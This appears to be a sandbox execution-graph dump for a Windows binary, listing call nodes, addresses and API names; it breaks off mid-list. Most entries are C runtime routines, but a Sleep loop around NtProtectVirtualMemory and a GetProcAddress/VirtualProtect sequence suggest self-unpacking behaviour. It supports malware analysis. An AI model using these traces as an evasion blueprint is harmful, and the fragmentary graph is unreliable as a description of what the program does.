                                                            execution_graph 7127 20a07260 GetStartupInfoW 7128 20a07286 7127->7128 7130 20a07318 7127->7130 7128->7130 7133 20a08be3 7128->7133 7131 20a072af 7131->7130 7132 20a072dd GetFileType 7131->7132 7132->7131 7134 20a08bef ___DestructExceptionObject 7133->7134 7135 20a08c13 7134->7135 7136 20a08bfc 7134->7136 7146 20a05671 RtlEnterCriticalSection 7135->7146 7137 20a06368 _free 20 API calls 7136->7137 7139 20a08c01 7137->7139 7141 20a062ac ___std_exception_copy 26 API calls 7139->7141 7140 20a08c1f 7145 20a08c4b 7140->7145 7147 20a08b34 7140->7147 7144 20a08c0b _abort 7141->7144 7144->7131 7154 20a08c72 7145->7154 7146->7140 7148 20a0637b __dosmaperr 20 API calls 7147->7148 7149 20a08b46 7148->7149 7151 20a05eb7 11 API calls 7149->7151 7153 20a08b53 7149->7153 7150 20a0571e _free 20 API calls 7152 20a08ba5 7150->7152 7151->7149 7152->7140 7153->7150 7157 20a056b9 RtlLeaveCriticalSection 7154->7157 7156 20a08c79 7156->7144 7157->7156 7331 20a081a0 7332 20a081d9 7331->7332 7333 20a081dd 7332->7333 7344 20a08205 7332->7344 7334 20a06368 _free 20 API calls 7333->7334 7335 20a081e2 7334->7335 7337 20a062ac ___std_exception_copy 26 API calls 7335->7337 7336 20a08529 7338 20a02ada _ValidateLocalCookies 5 API calls 7336->7338 7339 20a081ed 7337->7339 7340 20a08536 7338->7340 7341 20a02ada _ValidateLocalCookies 5 API calls 7339->7341 7342 20a081f9 7341->7342 7344->7336 7345 20a080c0 7344->7345 7348 20a080db 7345->7348 7346 20a02ada _ValidateLocalCookies 5 API calls 7347 20a08152 7346->7347 7347->7344 7348->7346 7394 20a0a1e0 7397 20a0a1fe 7394->7397 7396 20a0a1f6 7401 20a0a203 7397->7401 7398 20a0aa53 21 API calls 7400 20a0a42f 7398->7400 7399 20a0a298 7399->7396 7400->7396 7401->7398 7401->7399 6020 434c5b5 6022 434c5f5 6020->6022 6021 434c617 Sleep 6021->6020 6022->6020 6022->6021 6023 434c64e NtProtectVirtualMemory 6022->6023 6023->6022 7349 20a021a1 ___scrt_dllmain_exception_filter 7651 20a09d61 7652 20a09d81 7651->7652 7655 20a09db8 7652->7655 7654 20a09dab 7657 20a09dbf 7655->7657 7656 20a09e20 7658 20a0a90e 7656->7658 7664 20a0aa17 7656->7664 7657->7656 7661 20a09ddf 7657->7661 7658->7654 7661->7658 7662 20a0aa17 21 API calls 7661->7662 7663 20a0a93e 7662->7663 7663->7654 7665 20a0aa20 7664->7665 7668 20a0b19b 7665->7668 7670 20a0b1da __startOneArgErrorHandling 7668->7670 7674 20a0b25c __startOneArgErrorHandling 7670->7674 7678 20a0b59e 7670->7678 7671 20a0b286 7672 20a0b8b2 __startOneArgErrorHandling 20 API calls 7671->7672 7673 20a0b292 7671->7673 7672->7673 7675 20a02ada _ValidateLocalCookies 5 API calls 7673->7675 7674->7671 7676 20a078a3 __startOneArgErrorHandling 5 API calls 7674->7676 7677 20a09e6e 7675->7677 7676->7671 7677->7654 7679 20a0b5c1 __raise_exc RaiseException 7678->7679 7680 20a0b5bc 7679->7680 7680->7674 6024 20a0c7a7 6025 20a0c7be 6024->6025 6031 20a0c82c 6024->6031 6025->6031 6036 20a0c7e6 GetModuleHandleA 6025->6036 6027 20a0c872 6028 20a0c835 GetModuleHandleA 6030 20a0c83f 6028->6030 6029 20a0c7dd 6029->6030 6029->6031 6033 20a0c800 GetProcAddress 6029->6033 6030->6030 6030->6031 6032 20a0c85f GetProcAddress 6030->6032 6031->6027 6031->6028 6031->6030 6032->6031 6033->6031 6034 20a0c80d VirtualProtect 6033->6034 6034->6031 6035 20a0c81c VirtualProtect 6034->6035 6035->6031 6037 20a0c7ef 6036->6037 6039 20a0c82c 6036->6039 6048 20a0c803 GetProcAddress 6037->6048 6041 20a0c872 6039->6041 6042 20a0c835 GetModuleHandleA 6039->6042 6047 20a0c83f 6039->6047 6040 20a0c7f4 6040->6039 6043 20a0c800 GetProcAddress 6040->6043 6042->6047 6043->6039 6044 20a0c80d VirtualProtect 6043->6044 6044->6039 6045 20a0c81c VirtualProtect 6044->6045 6045->6039 6046 20a0c85f GetProcAddress 6046->6039 6047->6039 6047->6046 6049 20a0c82c 6048->6049 6050 20a0c80d VirtualProtect 6048->6050 6052 20a0c872 6049->6052 6053 20a0c835 GetModuleHandleA 6049->6053 6050->6049 6051 20a0c81c VirtualProtect 6050->6051 6051->6049 6055 20a0c83f 6053->6055 6054 20a0c85f GetProcAddress 6054->6055 6055->6049 6055->6054 7068 20a0742b 7069 20a07430 7068->7069 7071 20a07453 7069->7071 7072 20a08bae 7069->7072 7073 20a08bbb 7072->7073 7077 20a08bdd 7072->7077 7074 20a08bd7 7073->7074 7075 20a08bc9 RtlDeleteCriticalSection 7073->7075 7076 20a0571e _free 20 API calls 7074->7076 7075->7074 7075->7075 7076->7077 7077->7069 7158 20a0ac6b 7159 20a0ac84 __startOneArgErrorHandling 7158->7159 7161 20a0acad __startOneArgErrorHandling 7159->7161 7162 20a0b2f0 7159->7162 7163 20a0b329 __startOneArgErrorHandling 7162->7163 7165 20a0b350 __startOneArgErrorHandling 7163->7165 7173 20a0b5c1 7163->7173 7166 20a0b393 7165->7166 7167 20a0b36e 7165->7167 7186 20a0b8b2 7166->7186 7177 20a0b8e1 7167->7177 7170 20a0b38e __startOneArgErrorHandling 7171 20a02ada _ValidateLocalCookies 5 API calls 7170->7171 7172 20a0b3b7 7171->7172 7172->7161 7174 20a0b5ec __raise_exc 7173->7174 7175 20a0b7e5 RaiseException 7174->7175 7176 20a0b7fd 7175->7176 7176->7165 7178 20a0b8f0 7177->7178 7179 20a0b964 __startOneArgErrorHandling 7178->7179 7180 20a0b90f __startOneArgErrorHandling 7178->7180 7181 20a0b8b2 __startOneArgErrorHandling 20 API calls 7179->7181 7193 20a078a3 7180->7193 7185 20a0b95d 7181->7185 7184 20a0b8b2 __startOneArgErrorHandling 20 API calls 7184->7185 7185->7170 7187 20a0b8d4 7186->7187 7188 20a0b8bf 7186->7188 7190 20a06368 _free 20 API calls 7187->7190 7189 20a0b8d9 7188->7189 7191 20a06368 _free 20 API calls 7188->7191 7189->7170 7190->7189 7192 20a0b8cc 7191->7192 7192->7170 7194 20a078cb 7193->7194 7195 20a02ada _ValidateLocalCookies 5 API calls 7194->7195 7196 20a078e8 7195->7196 7196->7184 7196->7185 6282 20a060ac 6283 20a060dd 6282->6283 6285 20a060b7 6282->6285 6284 20a060c7 FreeLibrary 6284->6285 6285->6283 6285->6284 7197 20a0506f 7198 20a05081 7197->7198 7200 20a05087 7197->7200 7199 20a05000 20 API calls 7198->7199 7199->7200 7078 20a05630 7081 20a0563b 7078->7081 7079 20a05eb7 11 API calls 7079->7081 7080 20a05664 7084 20a05688 7080->7084 7081->7079 7081->7080 7082 20a05660 7081->7082 7085 20a056b4 7084->7085 7086 20a05695 7084->7086 7085->7082 7087 20a0569f RtlDeleteCriticalSection 7086->7087 7087->7085 7087->7087 7402 20a063f0 7403 20a06400 7402->7403 7404 20a06416 7402->7404 7405 20a06368 _free 20 API calls 7403->7405 7412 20a06561 7404->7412 7415 20a06480 7404->7415 7421 20a06580 7404->7421 7406 20a06405 7405->7406 7407 20a062ac ___std_exception_copy 26 API calls 7406->7407 7416 20a0640f 7407->7416 7410 20a064ee 7411 20a0571e _free 20 API calls 7410->7411 7411->7412 7447 20a0679a 7412->7447 7413 20a064e5 7413->7410 7413->7413 7418 20a06573 7413->7418 7438 20a085eb 7413->7438 7432 20a04e76 7415->7432 7419 20a062bc ___std_exception_copy 11 API calls 7418->7419 7420 20a0657f 7419->7420 7422 20a0658c 7421->7422 7422->7422 7423 20a0637b __dosmaperr 20 API calls 7422->7423 7424 20a065ba 7423->7424 7425 20a085eb 26 API calls 7424->7425 7426 20a065e6 7425->7426 7427 20a062bc ___std_exception_copy 11 API calls 7426->7427 7428 20a06615 ___scrt_fastfail 7427->7428 7429 20a066b6 FindFirstFileExA 7428->7429 7430 20a06705 7429->7430 7431 20a06580 26 API calls 7430->7431 7433 20a04e87 7432->7433 7434 20a04e8b 7432->7434 7433->7413 7434->7433 7435 20a0637b __dosmaperr 20 API calls 7434->7435 7436 20a04eb9 7435->7436 7437 20a0571e _free 20 API calls 7436->7437 7437->7433 7442 20a0853a 7438->7442 7439 20a0854f 7440 20a06368 _free 20 API calls 7439->7440 7441 20a08554 7439->7441 7443 20a0857a 7440->7443 7441->7413 7442->7439 7442->7441 7445 20a0858b 7442->7445 7444 20a062ac ___std_exception_copy 26 API calls 7443->7444 7444->7441 7445->7441 7446 20a06368 _free 20 API calls 7445->7446 7446->7443 7448 20a067a4 7447->7448 7449 20a067b4 7448->7449 7450 20a0571e _free 20 API calls 7448->7450 7451 20a0571e _free 20 API calls 7449->7451 7450->7448 7452 20a067bb 7451->7452 7452->7416 7681 20a03370 7692 20a03330 7681->7692 7693 20a03342 7692->7693 7694 20a0334f 7692->7694 7695 20a02ada _ValidateLocalCookies 5 API calls 7693->7695 7695->7694 7201 20a09e71 7203 20a09e95 7201->7203 7202 20a09f71 __startOneArgErrorHandling 7207 20a0b2f0 21 API calls 7202->7207 7208 20a0acad __startOneArgErrorHandling 7202->7208 7203->7202 7204 20a09ee6 7203->7204 7205 20a09ef8 7204->7205 7209 20a0aa53 7204->7209 7207->7208 7210 20a0aa70 RtlDecodePointer 7209->7210 7212 20a0aa80 7209->7212 7210->7212 7211 20a02ada _ValidateLocalCookies 5 API calls 7214 20a0ac67 7211->7214 7213 20a0ab0d 7212->7213 7215 20a0ab02 7212->7215 7217 20a0aab7 7212->7217 7213->7215 7216 20a06368 _free 20 API calls 7213->7216 7214->7205 7215->7211 7216->7215 7217->7215 7218 20a06368 _free 20 API calls 7217->7218 7218->7215 6290 20a03eb3 6293 20a05411 6290->6293 6294 20a0541d _abort 6293->6294 6299 20a05af6 GetLastError 6294->6299 6296 20a05422 6319 20a055a8 6296->6319 6300 20a05b12 6299->6300 6301 20a05b0c 6299->6301 6302 20a0637b __dosmaperr 20 API calls 6300->6302 6306 20a05b61 SetLastError 6300->6306 6303 20a05e08 __dosmaperr 11 API calls 6301->6303 6304 20a05b24 6302->6304 6303->6300 6305 20a05b2c 6304->6305 6307 20a05e5e __dosmaperr 11 API calls 6304->6307 6308 20a0571e _free 20 API calls 6305->6308 6306->6296 6309 20a05b41 6307->6309 6310 20a05b32 6308->6310 6309->6305 6311 20a05b48 6309->6311 6312 20a05b6d SetLastError 6310->6312 6313 20a0593c __dosmaperr 20 API calls 6311->6313 6314 20a055a8 _abort 35 API calls 6312->6314 6315 20a05b53 6313->6315 6316 20a05b79 6314->6316 6317 20a0571e _free 20 API calls 6315->6317 6318 20a05b5a 6317->6318 6318->6306 6318->6312 6330 20a07613 6319->6330 6322 20a055b8 6324 20a055c2 IsProcessorFeaturePresent 6322->6324 6329 20a055e0 6322->6329 6326 20a055cd 6324->6326 6360 20a060e2 6326->6360 6366 20a04bc1 6329->6366 6369 20a07581 6330->6369 6333 20a0766e 6334 20a0767a _abort 6333->6334 6335 20a076a7 _abort 6334->6335 6336 20a05b7a __dosmaperr 20 API calls 6334->6336 6342 20a076a1 _abort 6334->6342 6350 20a0771f 6335->6350 6386 20a05671 RtlEnterCriticalSection 6335->6386 6336->6342 6337 20a076f3 6338 20a06368 _free 20 API calls 6337->6338 6339 20a076f8 6338->6339 6383 20a062ac 6339->6383 6342->6335 6342->6337 6343 20a076d6 6342->6343 6395 20a0bdc9 6343->6395 6347 20a0777e 6357 20a077a9 6347->6357 6388 20a07665 6347->6388 6349 20a07776 6352 20a04bc1 _abort 28 API calls 6349->6352 6350->6347 6350->6349 6350->6357 6387 20a056b9 RtlLeaveCriticalSection 6350->6387 6352->6347 6354 20a05af6 _abort 38 API calls 6358 20a0780c 6354->6358 6356 20a07665 _abort 38 API calls 6356->6357 6391 20a0782e 6357->6391 6358->6343 6359 20a05af6 _abort 38 API calls 6358->6359 6359->6343 6361 20a060fe ___scrt_fastfail 6360->6361 6362 20a0612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6361->6362 6365 20a061fb ___scrt_fastfail 6362->6365 6363 20a02ada _ValidateLocalCookies 5 API calls 6364 20a06219 6363->6364 6364->6329 6365->6363 6414 20a0499b 6366->6414 6372 20a07527 6369->6372 6371 20a055ad 6371->6322 6371->6333 6373 20a07533 ___DestructExceptionObject 6372->6373 6378 20a05671 RtlEnterCriticalSection 6373->6378 6375 20a07541 6379 20a07575 6375->6379 6377 20a07568 _abort 6377->6371 6378->6375 6382 20a056b9 RtlLeaveCriticalSection 6379->6382 6381 20a0757f 6381->6377 6382->6381 6398 20a06231 6383->6398 6385 20a062b8 6385->6343 6386->6350 6387->6349 6389 20a05af6 _abort 38 API calls 6388->6389 6390 20a0766a 6389->6390 6390->6356 6392 20a07834 6391->6392 6393 20a077fd 6391->6393 6413 20a056b9 RtlLeaveCriticalSection 6392->6413 6393->6343 6393->6354 6393->6358 6396 20a02ada _ValidateLocalCookies 5 API calls 6395->6396 6397 20a0bdd4 6396->6397 6397->6397 6399 20a05b7a __dosmaperr 20 API calls 6398->6399 6400 20a06247 6399->6400 6401 20a062a6 6400->6401 6403 20a06255 6400->6403 6409 20a062bc IsProcessorFeaturePresent 6401->6409 6407 20a02ada _ValidateLocalCookies 5 API calls 6403->6407 6404 20a062ab 6405 20a06231 ___std_exception_copy 26 API calls 6404->6405 6406 20a062b8 6405->6406 6406->6385 6408 20a0627c 6407->6408 6408->6385 6410 20a062c7 6409->6410 6411 20a060e2 _abort 8 API calls 6410->6411 6412 20a062dc GetCurrentProcess TerminateProcess 6411->6412 6412->6404 6413->6393 6415 20a049a7 _abort 6414->6415 6416 20a049bf 6415->6416 6436 20a04af5 GetModuleHandleW 6415->6436 6445 20a05671 RtlEnterCriticalSection 6416->6445 6423 20a04a3c 6433 20a04a54 6423->6433 6449 20a04669 6423->6449 6424 20a049c7 6424->6423 6434 20a04a65 6424->6434 6446 20a0527a 6424->6446 6425 20a04a82 6456 20a04ab4 6425->6456 6426 20a04aae 6430 20a0bdc9 _abort 5 API calls 6426->6430 6427 20a04669 _abort 5 API calls 6427->6434 6432 20a04ab3 6430->6432 6433->6427 6453 20a04aa5 6434->6453 6437 20a049b3 6436->6437 6437->6416 6438 20a04b39 GetModuleHandleExW 6437->6438 6439 20a04b63 GetProcAddress 6438->6439 6440 20a04b78 6438->6440 6439->6440 6441 20a04b95 6440->6441 6442 20a04b8c FreeLibrary 6440->6442 6443 20a02ada _ValidateLocalCookies 5 API calls 6441->6443 6442->6441 6444 20a04b9f 6443->6444 6444->6416 6445->6424 6464 20a05132 6446->6464 6452 20a04698 6449->6452 6450 20a02ada _ValidateLocalCookies 5 API calls 6451 20a046c1 6450->6451 6451->6433 6452->6450 6486 20a056b9 RtlLeaveCriticalSection 6453->6486 6455 20a04a7e 6455->6425 6455->6426 6487 20a06025 6456->6487 6459 20a04ae2 6462 20a04b39 _abort 8 API calls 6459->6462 6460 20a04ac2 GetPEB 6460->6459 6461 20a04ad2 GetCurrentProcess TerminateProcess 6460->6461 6461->6459 6463 20a04aea ExitProcess 6462->6463 6467 20a050e1 6464->6467 6466 20a05156 6466->6423 6468 20a050ed ___DestructExceptionObject 6467->6468 6475 20a05671 RtlEnterCriticalSection 6468->6475 6470 20a050fb 6476 20a0515a 6470->6476 6474 20a05119 _abort 6474->6466 6475->6470 6477 20a0517a 6476->6477 6480 20a05182 6476->6480 6478 20a02ada _ValidateLocalCookies 5 API calls 6477->6478 6479 20a05108 6478->6479 6482 20a05126 6479->6482 6480->6477 6481 20a0571e _free 20 API calls 6480->6481 6481->6477 6485 20a056b9 RtlLeaveCriticalSection 6482->6485 6484 20a05130 6484->6474 6485->6484 6486->6455 6488 20a0604a 6487->6488 6490 20a06040 6487->6490 6489 20a05c45 __dosmaperr 5 API calls 6488->6489 6489->6490 6491 20a02ada _ValidateLocalCookies 5 API calls 6490->6491 6492 20a04abe 6491->6492 6492->6459 6492->6460 7088 20a0543d 7089 20a05440 7088->7089 7090 20a055a8 _abort 38 API calls 7089->7090 7091 20a0544c 7090->7091 7350 20a067bf 7355 20a067f4 7350->7355 7353 20a067db 7354 20a0571e _free 20 API calls 7354->7353 7356 20a06806 7355->7356 7360 20a067cd 7355->7360 7357 20a0680b 7356->7357 7359 20a06836 7356->7359 7358 20a0637b __dosmaperr 20 API calls 7357->7358 7361 20a06814 7358->7361 7359->7360 7366 20a071d6 7359->7366 7360->7353 7360->7354 7363 20a0571e _free 20 API calls 7361->7363 7363->7360 7364 20a06851 7365 20a0571e _free 20 API calls 7364->7365 7365->7360 7367 20a071e1 7366->7367 7368 20a07209 7367->7368 7369 20a071fa 7367->7369 7370 20a07218 7368->7370 7375 20a08a98 7368->7375 7371 20a06368 _free 20 API calls 7369->7371 7382 20a08acb 7370->7382 7373 20a071ff ___scrt_fastfail 7371->7373 7373->7364 7376 20a08aa3 7375->7376 7377 20a08ab8 RtlSizeHeap 7375->7377 7378 20a06368 _free 20 API calls 7376->7378 7377->7370 7379 20a08aa8 7378->7379 7380 20a062ac ___std_exception_copy 26 API calls 7379->7380 7381 20a08ab3 7380->7381 7381->7370 7383 20a08ae3 7382->7383 7384 20a08ad8 7382->7384 7385 20a08aeb 7383->7385 7393 20a08af4 __dosmaperr 7383->7393 7386 20a056d0 21 API calls 7384->7386 7387 20a0571e _free 20 API calls 7385->7387 7391 20a08ae0 7386->7391 7387->7391 7388 20a08af9 7390 20a06368 _free 20 API calls 7388->7390 7389 20a08b1e RtlReAllocateHeap 7389->7391 7389->7393 7390->7391 7391->7373 7392 20a0474f __dosmaperr 7 API calls 7392->7393 7393->7388 7393->7389 7393->7392 7453 20a05bff 7461 20a05d5c 7453->7461 7456 20a05c13 7457 20a05b7a __dosmaperr 20 API calls 7458 20a05c1b 7457->7458 7459 20a05c28 7458->7459 7460 20a05c2b 11 API calls 7458->7460 7460->7456 7462 20a05c45 __dosmaperr 5 API calls 7461->7462 7463 20a05d83 7462->7463 7464 20a05d9b TlsAlloc 7463->7464 7465 20a05d8c 7463->7465 7464->7465 7466 20a02ada _ValidateLocalCookies 5 API calls 7465->7466 7467 20a05c09 7466->7467 7467->7456 7467->7457 7545 20a01f3f 7546 20a01f4b ___DestructExceptionObject 7545->7546 7563 20a0247c 7546->7563 7548 20a01f52 7549 20a02041 7548->7549 7550 20a01f7c 7548->7550 7554 20a01f57 ___scrt_is_nonwritable_in_current_image 7548->7554 7552 20a02639 ___scrt_fastfail 4 API calls 7549->7552 7574 20a023de 7550->7574 7553 20a02048 7552->7553 7555 20a01f8b __RTC_Initialize 7555->7554 7577 20a022fc RtlInitializeSListHead 7555->7577 7557 20a01f99 ___scrt_initialize_default_local_stdio_options 7578 20a046c5 7557->7578 7561 20a01fb8 7561->7554 7562 20a04669 _abort 5 API calls 7561->7562 7562->7554 7564 20a02485 7563->7564 7586 20a02933 IsProcessorFeaturePresent 7564->7586 7568 20a02496 7573 20a0249a 7568->7573 7597 20a053c8 7568->7597 7571 20a024b1 7571->7548 7572 20a03529 ___vcrt_uninitialize 8 API calls 7572->7573 7573->7548 7628 20a024b5 7574->7628 7576 20a023e5 7576->7555 7577->7557 7579 20a046dc 7578->7579 7580 20a02ada _ValidateLocalCookies 5 API calls 7579->7580 7581 20a01fad 7580->7581 7581->7554 7582 20a023b3 7581->7582 7583 20a023b8 ___scrt_release_startup_lock 7582->7583 7584 20a02933 ___isa_available_init IsProcessorFeaturePresent 7583->7584 7585 20a023c1 7583->7585 7584->7585 7585->7561 7587 20a02491 7586->7587 7588 20a034ea 7587->7588 7589 20a034ef ___vcrt_initialize_winapi_thunks 7588->7589 7600 20a03936 7589->7600 7593 20a03510 7593->7568 7594 20a03505 7594->7593 7595 20a03972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7594->7595 7596 20a034fd 7595->7596 7596->7568 7624 20a07457 7597->7624 7601 20a0393f 7600->7601 7603 20a03968 7601->7603 7605 20a034f9 7601->7605 7614 20a03be0 7601->7614 7604 20a03972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7603->7604 7604->7605 7605->7596 7606 20a038e8 7605->7606 7619 20a03af1 7606->7619 7609 20a03ba2 ___vcrt_FlsSetValue 6 API calls 7610 20a0390b 7609->7610 7611 20a03918 7610->7611 7612 20a0391b ___vcrt_uninitialize_ptd 6 API calls 7610->7612 7611->7594 7613 20a038fd 7612->7613 7613->7594 7615 20a03a82 try_get_function 5 API calls 7614->7615 7616 20a03bfa 7615->7616 7617 20a03c18 InitializeCriticalSectionAndSpinCount 7616->7617 7618 20a03c03 7616->7618 7617->7618 7618->7601 7620 20a03a82 try_get_function 5 API calls 7619->7620 7621 20a03b0b 7620->7621 7622 20a03b24 TlsAlloc 7621->7622 7623 20a038f2 7621->7623 7623->7609 7623->7613 7627 20a07470 7624->7627 7625 20a02ada _ValidateLocalCookies 5 API calls 7626 20a024a3 7625->7626 7626->7571 7626->7572 7627->7625 7629 20a024c4 7628->7629 7630 20a024c8 7628->7630 7629->7576 7631 20a024d5 ___scrt_release_startup_lock 7630->7631 7632 20a02639 ___scrt_fastfail 4 API calls 7630->7632 7631->7576 7633 20a02559 7632->7633 6493 20a07a80 6494 20a07a8d 6493->6494 6495 20a0637b __dosmaperr 20 API calls 6494->6495 6496 20a07aa7 6495->6496 6497 20a0571e _free 20 API calls 6496->6497 6498 20a07ab3 6497->6498 6499 20a0637b __dosmaperr 20 API calls 6498->6499 6503 20a07ad9 6498->6503 6501 20a07acd 6499->6501 6502 20a0571e _free 20 API calls 6501->6502 6502->6503 6504 20a07ae5 6503->6504 6505 20a05eb7 6503->6505 6506 20a05c45 __dosmaperr 5 API calls 6505->6506 6507 20a05ede 6506->6507 6508 20a05efc InitializeCriticalSectionAndSpinCount 6507->6508 6509 20a05ee7 6507->6509 6508->6509 6510 20a02ada _ValidateLocalCookies 5 API calls 6509->6510 6511 20a05f13 6510->6511 6511->6503 7219 20a08640 7222 20a08657 7219->7222 7223 20a08665 7222->7223 7224 20a08679 7222->7224 7225 20a06368 _free 20 API calls 7223->7225 7226 20a08681 7224->7226 7228 20a08693 7224->7228 7229 20a0866a 7225->7229 7227 20a06368 _free 20 API calls 7226->7227 7230 20a08686 7227->7230 7231 20a054a7 __fassign 38 API calls 7228->7231 7234 20a08652 7228->7234 7232 20a062ac ___std_exception_copy 26 API calls 7229->7232 7233 20a062ac ___std_exception_copy 26 API calls 7230->7233 7231->7234 7232->7234 7233->7234 7634 20a07103 GetCommandLineA GetCommandLineW 7635 20a05303 7638 20a050a5 7635->7638 7647 20a0502f 7638->7647 7641 20a0502f 5 API calls 7642 20a050c3 7641->7642 7643 20a05000 20 API calls 7642->7643 7644 20a050ce 7643->7644 7645 20a05000 20 API calls 7644->7645 7646 20a050d9 7645->7646 7648 20a05048 7647->7648 7649 20a02ada _ValidateLocalCookies 5 API calls 7648->7649 7650 20a05069 7649->7650 7650->7641 7696 20a0af43 7697 20a0af59 7696->7697 7698 20a0af4d 7696->7698 7698->7697 7699 20a0af52 CloseHandle 7698->7699 7699->7697 7700 20a0a945 7704 20a0a96d 7700->7704 7701 20a0a9a5 7702 20a0a997 7705 20a0aa17 21 API calls 7702->7705 7703 20a0a99e 7709 20a0aa00 7703->7709 7704->7701 7704->7702 7704->7703 7707 20a0a99c 7705->7707 7710 20a0aa20 7709->7710 7711 20a0b19b __startOneArgErrorHandling 21 API calls 7710->7711 7712 20a0a9a3 7711->7712 7468 20a0a1c6 IsProcessorFeaturePresent 7469 20a07bc7 7470 20a07bd3 ___DestructExceptionObject 7469->7470 7471 20a07c0a _abort 7470->7471 7477 20a05671 RtlEnterCriticalSection 7470->7477 7473 20a07be7 7474 20a07f86 __fassign 20 API calls 7473->7474 7475 20a07bf7 7474->7475 7478 20a07c10 7475->7478 7477->7473 7481 20a056b9 RtlLeaveCriticalSection 7478->7481 7480 20a07c17 7480->7471 7481->7480 7713 20a05348 7714 20a03529 ___vcrt_uninitialize 8 API calls 7713->7714 7715 20a0534f 7714->7715 7716 20a07b48 7726 20a08ebf 7716->7726 7720 20a07b55 7739 20a0907c 7720->7739 7723 20a07b7f 7724 20a0571e _free 20 API calls 7723->7724 7725 20a07b8a 7724->7725 7743 20a08ec8 7726->7743 7728 20a07b50 7729 20a08fdc 7728->7729 7730 20a08fe8 ___DestructExceptionObject 7729->7730 7763 20a05671 RtlEnterCriticalSection 7730->7763 7732 20a0905e 7777 20a09073 7732->7777 7734 20a08ff3 7734->7732 7736 20a09032 RtlDeleteCriticalSection 7734->7736 7764 20a0a09c 7734->7764 7735 20a0906a _abort 7735->7720 7738 20a0571e _free 20 API calls 7736->7738 7738->7734 7740 20a09092 7739->7740 7741 20a07b64 RtlDeleteCriticalSection 7739->7741 7740->7741 7742 20a0571e _free 20 API calls 7740->7742 7741->7720 7741->7723 7742->7741 7744 20a08ed4 ___DestructExceptionObject 7743->7744 7753 20a05671 RtlEnterCriticalSection 7744->7753 7746 20a08f77 7758 20a08f97 7746->7758 7750 20a08f83 _abort 7750->7728 7751 20a08ee3 7751->7746 7752 20a08e78 66 API calls 7751->7752 7754 20a07b94 RtlEnterCriticalSection 7751->7754 7755 20a08f6d 7751->7755 7752->7751 7753->7751 7754->7751 7761 20a07ba8 RtlLeaveCriticalSection 7755->7761 7757 20a08f75 7757->7751 7762 20a056b9 RtlLeaveCriticalSection 7758->7762 7760 20a08f9e 7760->7750 7761->7757 7762->7760 7763->7734 7765 20a0a0a8 ___DestructExceptionObject 7764->7765 7766 20a0a0b9 7765->7766 7767 20a0a0ce 7765->7767 7768 20a06368 _free 20 API calls 7766->7768 7776 20a0a0c9 _abort 7767->7776 7780 20a07b94 RtlEnterCriticalSection 7767->7780 7770 20a0a0be 7768->7770 7772 20a062ac ___std_exception_copy 26 API calls 7770->7772 7771 20a0a0ea 7781 20a0a026 7771->7781 7772->7776 7774 20a0a0f5 7797 20a0a112 7774->7797 7776->7734 8045 20a056b9 RtlLeaveCriticalSection 7777->8045 7779 20a0907a 7779->7735 7780->7771 7782 20a0a033 7781->7782 7783 20a0a048 7781->7783 7784 20a06368 _free 20 API calls 7782->7784 7788 20a0a043 7783->7788 7800 20a08e12 7783->7800 7785 20a0a038 7784->7785 7787 20a062ac ___std_exception_copy 26 API calls 7785->7787 7787->7788 7788->7774 7790 20a0907c 20 API calls 7791 20a0a064 7790->7791 7806 20a07a5a 7791->7806 7793 20a0a06a 7813 20a0adce 7793->7813 7796 20a0571e _free 20 API calls 7796->7788 8044 20a07ba8 RtlLeaveCriticalSection 7797->8044 7799 20a0a11a 7799->7776 7801 20a08e2a 7800->7801 7802 20a08e26 7800->7802 7801->7802 7803 20a07a5a 26 API calls 7801->7803 7802->7790 7804 20a08e4a 7803->7804 7828 20a09a22 7804->7828 7807 20a07a66 7806->7807 7808 20a07a7b 7806->7808 7809 20a06368 _free 20 API calls 7807->7809 7808->7793 7810 20a07a6b 7809->7810 7811 20a062ac ___std_exception_copy 26 API calls 7810->7811 7812 20a07a76 7811->7812 7812->7793 7814 20a0adf2 7813->7814 7815 20a0addd 7813->7815 7817 20a0ae2d 7814->7817 7820 20a0ae19 7814->7820 7816 20a06355 __dosmaperr 20 API calls 7815->7816 7819 20a0ade2 7816->7819 7818 20a06355 __dosmaperr 20 API calls 7817->7818 7821 20a0ae32 7818->7821 7822 20a06368 _free 20 API calls 7819->7822 8001 20a0ada6 7820->8001 7824 20a06368 _free 20 API calls 7821->7824 7825 20a0a070 7822->7825 7826 20a0ae3a 7824->7826 7825->7788 7825->7796 7827 20a062ac ___std_exception_copy 26 API calls 7826->7827 7827->7825 7829 20a09a2e ___DestructExceptionObject 7828->7829 7830 20a09a36 7829->7830 7831 20a09a4e 7829->7831 7853 20a06355 7830->7853 7833 20a09aec 7831->7833 7837 20a09a83 7831->7837 7835 20a06355 __dosmaperr 20 API calls 7833->7835 7838 20a09af1 7835->7838 7836 20a06368 _free 20 API calls 7839 20a09a43 _abort 7836->7839 7856 20a08c7b RtlEnterCriticalSection 7837->7856 7841 20a06368 _free 20 API calls 7838->7841 7839->7802 7843 20a09af9 7841->7843 7842 20a09a89 7844 20a09aa5 7842->7844 7845 20a09aba 7842->7845 7846 20a062ac ___std_exception_copy 26 API calls 7843->7846 7848 20a06368 _free 20 API calls 7844->7848 7857 20a09b0d 7845->7857 7846->7839 7850 20a09aaa 7848->7850 7849 20a09ab5 7908 20a09ae4 7849->7908 7851 20a06355 __dosmaperr 20 API calls 7850->7851 7851->7849 7854 20a05b7a __dosmaperr 20 API calls 7853->7854 7855 20a0635a 7854->7855 7855->7836 7856->7842 7858 20a09b3b 7857->7858 7896 20a09b34 7857->7896 7859 20a09b5e 7858->7859 7860 20a09b3f 7858->7860 7863 20a09baf 7859->7863 7864 20a09b92 7859->7864 7862 20a06355 __dosmaperr 20 API calls 7860->7862 7861 20a02ada _ValidateLocalCookies 5 API calls 7865 20a09d15 7861->7865 7866 20a09b44 7862->7866 7875 20a09bc5 7863->7875 7911 20a0a00b 7863->7911 7867 20a06355 __dosmaperr 20 API calls 7864->7867 7865->7849 7868 20a06368 _free 20 API calls 7866->7868 7870 20a09b97 7867->7870 7872 20a09b4b 7868->7872 7874 20a06368 _free 20 API calls 7870->7874 7876 20a062ac ___std_exception_copy 26 API calls 7872->7876 7879 20a09b9f 7874->7879 7914 20a096b2 7875->7914 7876->7896 7877 20a09bd3 7880 20a09bd7 7877->7880 7881 20a09bf9 7877->7881 7878 20a09c0c 7883 20a09c20 7878->7883 7884 20a09c66 WriteFile 7878->7884 7882 20a062ac ___std_exception_copy 26 API calls 7879->7882 7885 20a09ccd 7880->7885 